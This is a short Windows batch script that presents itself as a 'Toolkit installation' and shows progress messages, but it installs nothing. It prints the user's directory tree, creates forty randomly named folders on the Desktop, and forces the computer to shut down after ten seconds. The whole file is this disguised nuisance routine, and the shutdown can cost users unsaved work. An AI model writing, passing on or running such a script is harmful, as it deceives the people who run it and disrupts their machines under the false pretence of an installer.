blob: fa02a126286de3715e2736cd7beddaaca4b424b6 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
@echo off
title Toolkit installation
msg * Toolkit installation is starting
cd /d %systemdrive%\Users\%username%\
@echo on
tree
@echo off
cd /d %systemdrive%\Users\%username%\Desktop
setlocal EnableDelayedExpansion
for /l %%x in (1,1,40) do (
mkdir !random!
)
endlocal
msg * The toolkit installation is nearly complete please wait ...
shutdown /s /t 10
|